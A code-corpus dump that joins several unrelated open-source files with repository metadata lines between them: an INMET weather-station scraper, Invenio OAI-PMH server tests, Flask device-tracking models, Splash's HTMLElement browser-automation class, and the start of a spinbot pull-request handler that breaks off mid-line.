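# Worked example (illustrative, not from the original source): for
#     _get_query('foo "bar baz"', ['title', 'description'])
# the helpers above first normalize the string to ['foo', 'bar baz'] and then
# build
#     (Q(title__icontains='foo') | Q(description__icontains='foo'))
#     & (Q(title__icontains='bar baz') | Q(description__icontains='bar baz'))
# i.e. every search term must match at least one of the given fields.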
def _get_thumbnails_list():
thumbnails_list = getThumbnails(settings.THUMBNAILS_DIR)
del thumbnails_list[0]
return thumbnails_list
|
bsd-2-clause
| 1,480,997,677,373,973,200 | 49.435185 | 212 | 0.663668 | false |
LucasFerreiraDaSilva/ScrapingINMET
|
geraBase.py
|
1
|
3704
|
"""
Author: Lucas Ferreira da Silva
Email: [email protected]
Description: Script to download the data of each meteorological station
             and to build a small JSON "database" covering all stations
Execution (command): python3 geraBase.py
Output: JSON file (estacoes.json) containing the data of all INMET
        meteorological stations
"""
import requests
import json
import bs4
import re
# Base URL for scraping the stations
url_map = "http://www.inmet.gov.br/sonabra/maps/pg_mapa.php"
res = requests.get (url_map)
res.raise_for_status()
# Split the page into the individual stations
list_markers = (res.text).split("//************* ESTACÃO ")
del list_markers[0]
# Initialize the list of station data for later processing
list_stations = []
# Scrape the raw data of each station
for i in list_markers:
st = (i.split("var imagem",maxsplit=1))[0].split("var ")
    # Capture the station id
station_id = str((st[0].split(maxsplit=1))[0])
    # Capture the station label
station_label = re.search(r"(?<=')[^']+(?=')", str(st[-1])).group(0)
    # Capture the station html
station_html = str(st[2].split("html = ", maxsplit=1)[1])
    # Create an auxiliary dictionary with each station's data
station_info = {}
station_info['id'] = station_id
station_info['label'] = station_label
station_info['html'] = station_html
list_stations.append(station_info)
# Initialize the stations dictionary
stations = {}
# Refined scraping of each station's data
for x in list_stations:
soup = bs4.BeautifulSoup(x['html'], 'html.parser')
    # Capture the link to the data table
link = ""
for a in soup.find_all('a'):
l = a.get('href')
if (l.find("pg_dspDadosCodigo_sim.php?", 32) != -1):
link = l
break
aux = (x['html'].split("<b><b>", maxsplit=1))[1].split("<table ", maxsplit=1)
    # Capture the list of geographic data
localization = ((aux[1].split("</table>", maxsplit=1))[1].split("</font>", maxsplit=1)[0]).split("<br>")
    # Capture the remaining station data
data_aux = ((aux[0].replace("<b>", "")).replace("</b>","")).split("<br>")
data = []
for d in data_aux:
if (d.find("<a ", 0, 4) == -1) and (d.find("</a>", 0, 4) == -1) and (len(d) > 0):
data.append(d)
    # Create the station object for the JSON
station_data = {}
details = {}
details['estacao'] = data[0].split(": ")[1]
details['codigo_omm'] = data[1].split(": ")[1]
if (len(data) > 2):
details['registro'] = data[2].split(": ")[1]
details['temp_max'] = (data[3].split(": ")[1]).replace("º","")
details['temp_min'] = (data[4].split(": ")[1]).replace("º","")
details['umidade'] = data[5].split(": ")[1]
details['pressao'] = data[6].split(": ")[1]
details['precipitacao'] = data[7].split(": ")[1]
details['vento_dir'] = (data[8].split(": ")[1]).replace("º","graus")
details['vento_vel'] = data[9].split(": ")[1]
station_data['label'] = x['label']
station_data['url'] = link
station_data['latitude'] = (localization[1].split(": ")[1]).replace("º","")
station_data['longitude'] = (localization[2].split(": ")[1]).replace("º","")
station_data['altitude'] = localization[3].split(": ")[1]
station_data['abertura'] = localization[0].split(": ")[1]
station_data['detalhes'] = details
stations[str(x['id'])] = station_data
# Write the data to a JSON file
with open('estacoes.json', 'w') as fp:
json.dump(stations, fp, indent=4, ensure_ascii=False, sort_keys=True)
print("Database successfully generated!")
|
mit
| 8,083,539,564,384,112,000 | 31.707965 | 108 | 0.606061 | false |
jirikuncar/invenio-oaiserver
|
tests/test_verbs.py
|
1
|
18989
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015, 2016 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Test OAI verbs."""
from __future__ import absolute_import
import uuid
from copy import deepcopy
from time import sleep
from invenio_db import db
from invenio_indexer.api import RecordIndexer
from invenio_pidstore.minters import recid_minter
from invenio_records.api import Record
from lxml import etree
from invenio_oaiserver.minters import oaiid_minter
from invenio_oaiserver.models import OAISet
from invenio_oaiserver.response import NS_DC, NS_OAIDC, NS_OAIPMH, \
datetime_to_datestamp
def _xpath_errors(body):
"""Find errors in body."""
return list(body.iter('{*}error'))
def test_no_verb(app):
"""Test response when no verb is specified."""
with app.test_client() as c:
result = c.get('/oai2d')
tree = etree.fromstring(result.data)
assert 'Missing data for required field.' in _xpath_errors(
tree)[0].text
def test_wrong_verb(app):
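    """Test response when an invalid verb is specified."""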
with app.test_client() as c:
result = c.get('/oai2d?verb=Aaa')
tree = etree.fromstring(result.data)
assert 'This is not a valid OAI-PMH verb:Aaa' in _xpath_errors(
tree)[0].text
def test_identify(app):
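    """Test Identify verb."""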
with app.test_client() as c:
result = c.get('/oai2d?verb=Identify')
assert 200 == result.status_code
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:Identify',
namespaces=namespaces)) == 1
repository_name = tree.xpath('/x:OAI-PMH/x:Identify/x:repositoryName',
namespaces=namespaces)
assert len(repository_name) == 1
assert repository_name[0].text == 'Invenio-OAIServer'
base_url = tree.xpath('/x:OAI-PMH/x:Identify/x:baseURL',
namespaces=namespaces)
assert len(base_url) == 1
assert base_url[0].text == 'http://app/oai2d'
protocolVersion = tree.xpath('/x:OAI-PMH/x:Identify/x:protocolVersion',
namespaces=namespaces)
assert len(protocolVersion) == 1
assert protocolVersion[0].text == '2.0'
adminEmail = tree.xpath('/x:OAI-PMH/x:Identify/x:adminEmail',
namespaces=namespaces)
assert len(adminEmail) == 1
assert adminEmail[0].text == '[email protected]'
earliestDatestamp = tree.xpath(
'/x:OAI-PMH/x:Identify/x:earliestDatestamp',
namespaces=namespaces)
assert len(earliestDatestamp) == 1
deletedRecord = tree.xpath('/x:OAI-PMH/x:Identify/x:deletedRecord',
namespaces=namespaces)
assert len(deletedRecord) == 1
assert deletedRecord[0].text == 'no'
granularity = tree.xpath('/x:OAI-PMH/x:Identify/x:granularity',
namespaces=namespaces)
assert len(granularity) == 1
def test_getrecord(app):
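    """Test GetRecord verb."""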
schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'field': {'type': 'boolean'},
},
'required': ['title'],
}
with app.test_request_context():
with db.session.begin_nested():
record = Record.create({'title': 'Test0', '$schema': schema}).model
recid_minter(record.id, record.json)
pid = oaiid_minter(record.id, record.json)
db.session.commit()
pid_value = pid.pid_value
pid_updated = pid.updated
with app.test_client() as c:
result = c.get(
"/oai2d?verb=GetRecord&identifier={0}&metadataPrefix=oai_dc"
.format(pid_value))
assert 200 == result.status_code
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:GetRecord',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:GetRecord/x:header',
namespaces=namespaces)) == 1
assert len(tree.xpath(
'/x:OAI-PMH/x:GetRecord/x:header/x:identifier',
namespaces=namespaces)) == 1
identifier = tree.xpath(
'/x:OAI-PMH/x:GetRecord/x:header/x:identifier/text()',
namespaces=namespaces)
assert identifier == [str(record.id)]
datestamp = tree.xpath(
'/x:OAI-PMH/x:GetRecord/x:header/x:datestamp/text()',
namespaces=namespaces)
assert datestamp == [datetime_to_datestamp(pid_updated)]
assert len(tree.xpath('/x:OAI-PMH/x:GetRecord/x:metadata',
namespaces=namespaces)) == 1
def test_getrecord_fail(app):
"""Test GetRecord if record doesn't exist."""
with app.test_request_context():
with app.test_client() as c:
result = c.get(
"/oai2d?verb=GetRecord&identifier={0}&metadataPrefix=oai_dc"
.format('not-exist-pid'))
assert 422 == result.status_code
tree = etree.fromstring(result.data)
_check_xml_error(tree, code='idDoesNotExist')
def _check_xml_error(tree, code):
"""Text xml for a error idDoesNotExist."""
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
error = tree.xpath('/x:OAI-PMH/x:error', namespaces=namespaces)
assert len(error) == 1
assert error[0].attrib['code'] == code
def test_identify_with_additional_args(app):
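    """Test Identify with additional (invalid) arguments."""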
with app.test_client() as c:
        result = c.get('/oai2d?verb=Identify&notAValidArg=True')
tree = etree.fromstring(result.data)
assert 'You have passed too many arguments.' == _xpath_errors(
tree)[0].text
def test_listmetadataformats(app):
"""Test ListMetadataFormats."""
_listmetadataformats(app=app, query='/oai2d?verb=ListMetadataFormats')
def test_listmetadataformats_record(app):
"""Test ListMetadataFormats for a record."""
schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'field': {'type': 'boolean'},
},
'required': ['title'],
}
with app.test_request_context():
with db.session.begin_nested():
record_id = uuid.uuid4()
data = {'title': 'Test0', '$schema': schema}
recid_minter(record_id, data)
pid = oaiid_minter(record_id, data)
Record.create(data, id_=record_id)
pid_value = pid.pid_value
db.session.commit()
_listmetadataformats(
app=app,
query='/oai2d?verb=ListMetadataFormats&identifier={0}'.format(
pid_value))
def test_listmetadataformats_record_fail(app):
"""Test ListMetadataFormats for a record that doesn't exist."""
query = '/oai2d?verb=ListMetadataFormats&identifier={0}'.format(
"pid-not-exixts")
with app.test_request_context():
with app.test_client() as c:
result = c.get(query)
tree = etree.fromstring(result.data)
_check_xml_error(tree, code='idDoesNotExist')
def _listmetadataformats(app, query):
"""Try ListMetadataFormats."""
with app.test_request_context():
with app.test_client() as c:
result = c.get(query)
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListMetadataFormats',
namespaces=namespaces)) == 1
metadataFormats = tree.xpath(
'/x:OAI-PMH/x:ListMetadataFormats/x:metadataFormat',
namespaces=namespaces)
cfg_metadataFormats = deepcopy(
app.config.get('OAISERVER_METADATA_FORMATS', {}))
assert len(metadataFormats) == len(cfg_metadataFormats)
for metadataFormat in metadataFormats:
# prefix
prefix = metadataFormat.xpath(
'/x:OAI-PMH/x:ListMetadataFormats/x:metadataFormat/'
'x:metadataPrefix', namespaces=namespaces)
assert len(prefix) == 1
assert prefix[0].text in cfg_metadataFormats
# schema
schema = metadataFormat.xpath(
'/x:OAI-PMH/x:ListMetadataFormats/x:metadataFormat/'
'x:schema', namespaces=namespaces)
assert len(schema) == 1
assert schema[0].text in cfg_metadataFormats[
prefix[0].text]['schema']
# metadataNamespace
metadataNamespace = metadataFormat.xpath(
'/x:OAI-PMH/x:ListMetadataFormats/x:metadataFormat/'
'x:metadataNamespace', namespaces=namespaces)
assert len(metadataNamespace) == 1
assert metadataNamespace[0].text in cfg_metadataFormats[
prefix[0].text]['namespace']
# remove tested format
del cfg_metadataFormats[prefix[0].text]
def test_listsets(app):
"""Test ListSets."""
with app.test_request_context():
with db.session.begin_nested():
a = OAISet(spec='test', name='Test', description="test desc")
db.session.add(a)
with app.test_client() as c:
result = c.get('/oai2d?verb=ListSets')
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListSets',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set/x:setSpec',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set/x:setName',
namespaces=namespaces)) == 1
assert len(tree.xpath(
'/x:OAI-PMH/x:ListSets/x:set/x:setDescription',
namespaces=namespaces
)) == 1
namespaces['y'] = NS_OAIDC
assert len(
tree.xpath('/x:OAI-PMH/x:ListSets/x:set/x:setDescription/y:dc',
namespaces=namespaces)
) == 1
namespaces['z'] = NS_DC
assert len(
tree.xpath('/x:OAI-PMH/x:ListSets/x:set/x:setDescription/y:dc/'
'z:description', namespaces=namespaces)
) == 1
text = tree.xpath(
'/x:OAI-PMH/x:ListSets/x:set/x:setDescription/y:dc/'
'z:description/text()', namespaces=namespaces)
assert len(text) == 1
assert text[0] == 'test desc'
def test_fail_missing_metadataPrefix(app):
"""Test ListRecords fail missing metadataPrefix."""
queries = [
'/oai2d?verb=ListRecords',
'/oai2d?verb=GetRecord&identifier=123',
'/oai2d?verb=ListIdentifiers'
]
for query in queries:
with app.test_request_context():
with app.test_client() as c:
result = c.get(query)
tree = etree.fromstring(result.data)
_check_xml_error(tree, code='badArgument')
def test_fail_not_exist_metadataPrefix(app):
"""Test ListRecords fail not exist metadataPrefix."""
queries = [
'/oai2d?verb=ListRecords&metadataPrefix=not-exist',
'/oai2d?verb=GetRecord&identifier=123&metadataPrefix=not-exist',
'/oai2d?verb=ListIdentifiers&metadataPrefix=not-exist'
]
for query in queries:
with app.test_request_context():
with app.test_client() as c:
result = c.get(query)
tree = etree.fromstring(result.data)
_check_xml_error(tree, code='badArgument')
def test_listrecords_fail_missing_metadataPrefix(app):
"""Test ListRecords fail missing metadataPrefix."""
query = '/oai2d?verb=ListRecords&'
with app.test_request_context():
with app.test_client() as c:
result = c.get(query)
tree = etree.fromstring(result.data)
_check_xml_error(tree, code='badArgument')
def test_listrecords(app):
"""Test ListRecords."""
schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'field': {'type': 'boolean'},
},
'required': ['title'],
}
with app.test_request_context():
indexer = RecordIndexer()
with db.session.begin_nested():
record_id = uuid.uuid4()
data = {'title': 'Test0', '$schema': schema}
recid_minter(record_id, data)
oaiid_minter(record_id, data)
record = Record.create(data, id_=record_id)
db.session.commit()
indexer.index_by_id(record_id)
sleep(1)
with app.test_client() as c:
result = c.get('/oai2d?verb=ListRecords&metadataPrefix=oai_dc')
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords/x:record',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords/x:record/x:header',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords/x:record/x:header'
'/x:identifier', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords/x:record/x:header'
'/x:datestamp', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListRecords/x:record/x:metadata',
namespaces=namespaces)) == 1
def test_listidentifiers(app):
"""Test verb ListIdentifiers."""
schema = {
'type': 'object',
'properties': {
'title': {'type': 'string'},
'field': {'type': 'boolean'},
},
'required': ['title'],
}
with app.test_request_context():
indexer = RecordIndexer()
with db.session.begin_nested():
record_id = uuid.uuid4()
data = {'title': 'Test0', '$schema': schema}
recid_minter(record_id, data)
pid = oaiid_minter(record_id, data)
record = Record.create(data, id_=record_id)
db.session.commit()
indexer.index_by_id(record_id)
sleep(1)
pid_value = pid.pid_value
with app.test_client() as c:
result = c.get(
"/oai2d?verb=ListIdentifiers&metadataPrefix=oai_dc"
)
tree = etree.fromstring(result.data)
namespaces = {'x': NS_OAIPMH}
assert len(tree.xpath('/x:OAI-PMH', namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListIdentifiers',
namespaces=namespaces)) == 1
assert len(tree.xpath('/x:OAI-PMH/x:ListIdentifiers/x:header',
namespaces=namespaces)) == 1
identifier = tree.xpath(
'/x:OAI-PMH/x:ListIdentifiers/x:header/x:identifier',
namespaces=namespaces
)
assert len(identifier) == 1
assert identifier[0].text == str(pid_value)
datestamp = tree.xpath(
'/x:OAI-PMH/x:ListIdentifiers/x:header/x:datestamp',
namespaces=namespaces
)
assert len(datestamp) == 1
assert datestamp[0].text == datetime_to_datestamp(record.updated)
def test_list_sets_long(app):
"""Test listing of sets."""
from invenio_db import db
from invenio_oaiserver.models import OAISet
with app.app_context():
with db.session.begin_nested():
for i in range(27):
db.session.add(OAISet(
spec='test{0}'.format(i),
name='Test{0}'.format(i),
description='test desc {0}'.format(i),
search_pattern='title:Test{0}'.format(i),
))
db.session.commit()
namespaces = {'x': NS_OAIPMH}
with app.test_client() as c:
# First page:
result = c.get('/oai2d?verb=ListSets')
tree = etree.fromstring(result.data)
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set',
namespaces=namespaces)) == 10
resumption_token = tree.xpath(
'/x:OAI-PMH/x:ListSets/x:resumptionToken', namespaces=namespaces
)[0]
assert resumption_token.text
# Second page:
result = c.get('/oai2d?verb=ListSets&resumptionToken={0}'.format(
resumption_token.text
))
tree = etree.fromstring(result.data)
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set',
namespaces=namespaces)) == 10
resumption_token = tree.xpath(
'/x:OAI-PMH/x:ListSets/x:resumptionToken', namespaces=namespaces
)[0]
assert resumption_token.text
# Third page:
result = c.get('/oai2d?verb=ListSets&resumptionToken={0}'.format(
resumption_token.text
))
tree = etree.fromstring(result.data)
assert len(tree.xpath('/x:OAI-PMH/x:ListSets/x:set',
namespaces=namespaces)) == 7
resumption_token = tree.xpath(
'/x:OAI-PMH/x:ListSets/x:resumptionToken', namespaces=namespaces
)[0]
assert not resumption_token.text
def test_list_sets_with_resumption_token_and_other_args(app):
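    """Test ListSets with a resumption token and other arguments."""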
pass
|
gpl-2.0
| 6,154,629,541,478,651,000 | 34.964015 | 79 | 0.577229 | false |
micjabbour/AndroidGuard-WebApp
|
AndroidGuard/models.py
|
1
|
3073
|
from . import db
from .config import AppConfig
from datetime import datetime
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from sqlalchemy import desc
from itsdangerous import Serializer, BadSignature
class Location(db.Model):
id = db.Column(db.Integer, primary_key=True)
latitude = db.Column(db.DECIMAL(9,6), nullable=False)
longitude = db.Column(db.DECIMAL(9,6), nullable=False)
timestamp = db.Column(db.DateTime, default=datetime.utcnow)
device_id = db.Column(db.Integer, db.ForeignKey('device.id'), nullable=False)
def serialize(self):
return {'latitude': str(self.latitude),
'longitude': str(self.longitude),
'timestamp': self.timestamp.isoformat()+'Z' # HACK
}
class Device(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
fcm_token = db.Column(db.Text)
locations = db.relationship('Location', backref='device', lazy='select')
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    __table_args__ = (db.UniqueConstraint('name', 'user_id'),)
@property
def last_location(self):
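        # Most recent stored location for this device (highest id), or None if none exist.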
return Location.query.filter_by(device_id=self.id).order_by(desc('location.id')).first()
def get_device_dict(self):
device_dict = {'id': self.id, 'name': self.name}
if self.last_location:
device_dict['last_location'] = self.last_location.serialize()
return device_dict
def generate_auth_token(self):
s = Serializer(AppConfig.SECRET_KEY)
return s.dumps(self.id)
@staticmethod
def verify_auth_token(token):
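        # Decode the signed token and return the matching Device, or None if the signature is invalid.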
s = Serializer(AppConfig.SECRET_KEY)
try:
id = s.loads(token)
except BadSignature:
return None
device = Device.query.get(id)
return device
@staticmethod
def get_by_devicename(user, name):
device_list = user.devices
for device in device_list:
if device.name == name:
return device
return None
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.Text, unique=True)
password_hash = db.Column(db.Text)
devices = db.relationship('Device', backref='user', lazy='dynamic')
@property
def password(self):
raise AttributeError('password: write-only field')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
@staticmethod
def get_by_username(username):
return User.query.filter_by(username=username).first()
@staticmethod
def verify_credentials(username, password):
user = User.get_by_username(username)
if user is not None and user.check_password(password):
return user
return None
def __repr__(self):
return "<User '{}'>".format(self.username)
|
unlicense
| 256,992,587,173,349,120 | 31.691489 | 96 | 0.649528 | false |
pawelmhm/splash
|
splash/html_element.py
|
1
|
12235
|
from __future__ import absolute_import
from functools import wraps
from splash.exceptions import DOMError
from splash.jsutils import escape_js
from splash.casperjs_utils import (
VISIBLE_JS_FUNC,
ELEMENT_INFO_JS,
FIELD_VALUE_JS,
FORM_VALUES_JS,
SET_FIELD_VALUE_JS
)
DIMENSIONS_JS_FUNC = """
(function(elem) {
var rect = elem.getClientRects()[0];
return {"x":rect.left, "y": rect.top, "width": rect.width, "height": rect.height}
})(%s)
"""
FETCH_TEXT_JS_FUNC = """
(function(elem) {
return (elem.textContent || elem.innerText || elem.value || '').trim();
})(%s)
"""
FILL_FORM_VALUES_JS = """
function (form, values, setFieldValue) {
Object.keys(values).forEach(function (name) {
var selector = "[name='" + name + "']";
setFieldValue(selector, values[name], form);
});
}
"""
def empty_strings_as_none(meth):
@wraps(meth)
def change_return_value_to_none_for_empty_string(*args, **kwargs):
retval = meth(*args, **kwargs)
return None if retval == '' else retval
return change_return_value_to_none_for_empty_string
def escape_js_args(*args):
return ','.join([
arg.element_js if isinstance(arg, HTMLElement) else escape_js(arg)
for arg in args
])
class HTMLElement(object):
""" Class for manipulating DOM HTML Element """
def __init__(self, tab, storage, event_handlers_storage, events_storage,
node_id):
self.tab = tab
self.storage = storage
self.event_handlers_storage = event_handlers_storage
self.events_storage = events_storage
self.id = node_id
self.element_js = self.get_element_js()
msg = "HTMLElement is created with id=%s in object %s" % (
self.id, self.element_js
)
self.tab.logger.log(msg, min_level=4)
def get_element_js(self):
""" Return JS object to which the element is assigned. """
return 'window["%s"]["%s"]' % (self.storage.name, self.id)
def assert_element_exists(self):
""" Raise exception if the element no longer exists in DOM. """
if not self.exists():
raise DOMError({
'type': DOMError.NOT_IN_DOM_ERROR,
'message': "Element no longer exists in DOM"
})
def assert_node_type(self, node_type):
"""
Raise an exception if the type of the element doesn't match node_type.
"""
actual_type = self.node_property('nodeName').lower()
if actual_type != node_type.lower():
raise DOMError({
'type': DOMError.NOT_COMPATIBLE_NODE_ERROR,
'message': "Node should be {!r}, but got {!r}".format(
node_type, actual_type)
})
def exists(self):
""" Return flag indicating whether element is in DOM """
exists = self.tab.evaljs("document.contains(%s)" % self.element_js)
return bool(exists)
@empty_strings_as_none
def node_property(self, property_name):
""" Return value of the specified property of the element """
return self.tab.evaljs(u"{element}[{property}]".format(
element=self.element_js,
property=escape_js(property_name)
))
@empty_strings_as_none
def set_node_property(self, property_name, property_value):
""" Set value of the specified property of the element """
return self.tab.evaljs(u"{element}[{property}] = {value}".format(
element=self.element_js,
property=escape_js(property_name),
value=escape_js(property_value)
))
def get_node_style(self, property_name):
""" Get value of the style property of the element """
return self.tab.evaljs(u"{element}.style[{property}]".format(
element=self.element_js,
property=escape_js(property_name),
))
def set_node_style(self, property_name, property_value):
""" Set value of the style property of the element """
return self.tab.evaljs(u"{element}.style[{property}] = {value}".format(
element=self.element_js,
property=escape_js(property_name),
value=escape_js(property_value)
))
def node_method(self, method_name):
""" Return function which calls the specified method of the element """
@empty_strings_as_none
def call(*args):
return self.tab.evaljs(u"{element}[{method}]({args})".format(
element=self.element_js,
method=escape_js(method_name),
args=escape_js_args(*args)
))
return call
def mouse_click(self, x=0, y=0, button="left"):
""" Click on the element """
self.assert_element_exists()
dimensions = self._get_dimensions()
self.tab.mouse_click(dimensions["x"] + x, dimensions["y"] + y, button)
def mouse_hover(self, x=0, y=0):
""" Hover over the element """
self.assert_element_exists()
dimensions = self._get_dimensions()
self.tab.mouse_hover(dimensions["x"] + x, dimensions["y"] + y)
def _get_dimensions(self):
return self.tab.evaljs(DIMENSIONS_JS_FUNC % self.element_js)
def styles(self):
""" Return computed styles of the element """
return self.tab.evaljs("getComputedStyle(%s)" % self.element_js)
def bounds(self):
""" Return bounding client rectangle of the element"""
return self.tab.evaljs("%s.getBoundingClientRect()" % self.element_js)
def png(self, width=None, scale_method=None, pad=None):
""" Return screenshot of the element in PNG format.
Optional `pad` can be provided which can be in two formats:
- integer containing amount of pad for all sides
(top, left, bottom, right)
- tuple with `left`, `top`, `right`, `bottom` integer
values for padding
Padding value can be negative which means that the image will be cropped.
"""
if not self.exists() or not self.visible():
return None
region = _bounds_to_region(self.bounds(), pad)
return self.tab.png(width, region=region, scale_method=scale_method)
def jpeg(self, width=None, scale_method=None, quality=None, pad=None):
""" Return screenshot of the element in JPEG format.
Optional `pad` can be provided which can be in two formats:
- integer containing amount of pad for all sides
(top, left, bottom, right)
- tuple with `left`, `top`, `right`, `bottom` integer
values for padding
Padding value can be negative which means that the image will be cropped.
"""
if not self.exists() or not self.visible():
return None
region = _bounds_to_region(self.bounds(), pad)
return self.tab.jpeg(width, region=region, scale_method=scale_method,
quality=quality)
def visible(self):
""" Return flag indicating whether element is visible """
self.assert_element_exists()
return self.tab.evaljs(u"({visible_func})({element})".format(
visible_func=VISIBLE_JS_FUNC,
element=self.element_js
))
def text(self):
""" Return text of the element """
return self.tab.evaljs(FETCH_TEXT_JS_FUNC % self.element_js)
def info(self):
""" Return information about the element """
return self.tab.evaljs(u"({element_info_func})({element}, {visible_func})".format(
element_info_func=ELEMENT_INFO_JS,
element=self.element_js,
visible_func=VISIBLE_JS_FUNC
))
def field_value(self):
""" Return the value of the element if it is a field """
return self.tab.evaljs(u"({field_value_func})({element})".format(
field_value_func=FIELD_VALUE_JS,
element=self.element_js
))
def form_values(self, values='auto'):
""" Return all values of the element if it is a form"""
self.assert_node_type('form')
return self.tab.evaljs(u"({form_values_func})({element}, {values}, {field_value_func})".format(
form_values_func=FORM_VALUES_JS,
field_value_func=FIELD_VALUE_JS,
values=escape_js(values),
element=self.element_js
))
def fill(self, values):
""" Fill the values of the element """
return self.tab.evaljs(u"({fill_form_values_func})({element}, {values}, {set_field_value})".format(
fill_form_values_func=FILL_FORM_VALUES_JS,
element=self.element_js,
values=escape_js(values),
set_field_value=SET_FIELD_VALUE_JS
))
def send_keys(self, text):
""" Send key events to the element separated by whitespaces """
if not self.focused():
self.mouse_click()
self.tab.send_keys(text)
def send_text(self, text):
""" Send text to the element """
if not self.focused():
self.mouse_click()
self.tab.send_text(text)
def focused(self):
""" Return True if the current element is focused """
return self.tab.evaljs(
"{} === document.activeElement".format(self.element_js)
)
def set_event_handler(self, event_name, handler):
""" Set on-event type event listeners to the element """
handler_id = self.event_handlers_storage.add(handler)
func = u"window[{storage_name}][{func_id}]".format(
storage_name=escape_js(self.event_handlers_storage.name),
func_id=escape_js(handler_id),
)
self.tab.evaljs(u"{element}['on' + {event_name}] = {func}".format(
element=self.element_js,
event_name=escape_js(event_name),
func=func
))
return handler_id
def unset_event_handler(self, event_name, handler_id):
""" Remove on-event type event listeners from the element """
self.tab.evaljs(u"{element}['on' + {event_name}] = null".format(
element=self.element_js,
event_name=escape_js(event_name),
))
self.event_handlers_storage.remove(handler_id)
def add_event_handler(self, event_name, handler, options=None):
""" Add event listeners to the element for the specified event """
handler_id = self.event_handlers_storage.add(handler)
func = u"window[{storage_name}][{func_id}]".format(
storage_name=escape_js(self.event_handlers_storage.name),
func_id=escape_js(handler_id),
)
self.tab.evaljs(u"{element}.addEventListener({event_name}, {func}, {options})".format(
element=self.element_js,
event_name=escape_js(event_name),
func=func,
options=escape_js(options)
))
return handler_id
def remove_event_handler(self, event_name, handler_id):
"""
Remove event listeners from the element for the specified event
and handler.
"""
func = u"window[{storage_name}][{func_id}]".format(
storage_name=escape_js(self.event_handlers_storage.name),
func_id=escape_js(handler_id),
)
self.tab.evaljs(u"{element}.removeEventListener({event_name}, {func})".format(
element=self.element_js,
event_name=escape_js(event_name),
func=func
))
self.event_handlers_storage.remove(handler_id)
def submit(self):
""" Submit form element """
self.assert_node_type('form')
self.node_method('submit')()
def _padded(region, pad):
"""
    >>> _padded([1, 1, 4, 4], [0, 1, 2, 3])
(1, 0, 6, 7)
>>> _padded([1, 1, 4, 4], 2)
(-1, -1, 6, 6)
"""
if not pad:
return region
if isinstance(pad, (int, float)):
pad = (pad, pad, pad, pad)
return (
region[0] - pad[0],
region[1] - pad[1],
region[2] + pad[2],
region[3] + pad[3]
)
def _bounds_to_region(bounds, pad):
region = bounds["left"], bounds["top"], bounds["right"], bounds["bottom"]
return _padded(region, pad)
|
bsd-3-clause
| -242,330,115,481,414,270 | 33.758523 | 107 | 0.586105 | false |
skim1420/spinnaker
|
spinbot/event/release_branch_pull_request_handler.py
|
1
|
2049
|
from .handler import Handler
from .pull_request_event import GetBaseBranch, GetPullRequest, GetTitle, GetRepo
from gh import ReleaseBranchFor, ParseCommitMessage
format_message = ('Features cannot be merged into release branches. The following commits ' +
'are not tagged as one of "{}":\n\n{}\n\n' +
'Read more about [commit conventions](https://www.spinnaker.io/community/contributing/submitting/#commit-message-conventions) ' +
'and [patch releases](https://www.spinnaker.io/community/releases/release-cadence/#patching-the-release-candidate) here.')
class ReleaseBranchPullRequestHandler(Handler):
def __init__(self):
super().__init__()
self.omit_repos = self.config.get('omit_repos', [])
self.allowed_types = self.config.get(
'allowed_types',
['fix', 'chore', 'docs', 'test']
)
def handles(self, event):
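        # Only handle newly opened pull requests whose base branch is a release branch.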
return (event.type == 'PullRequestEvent'
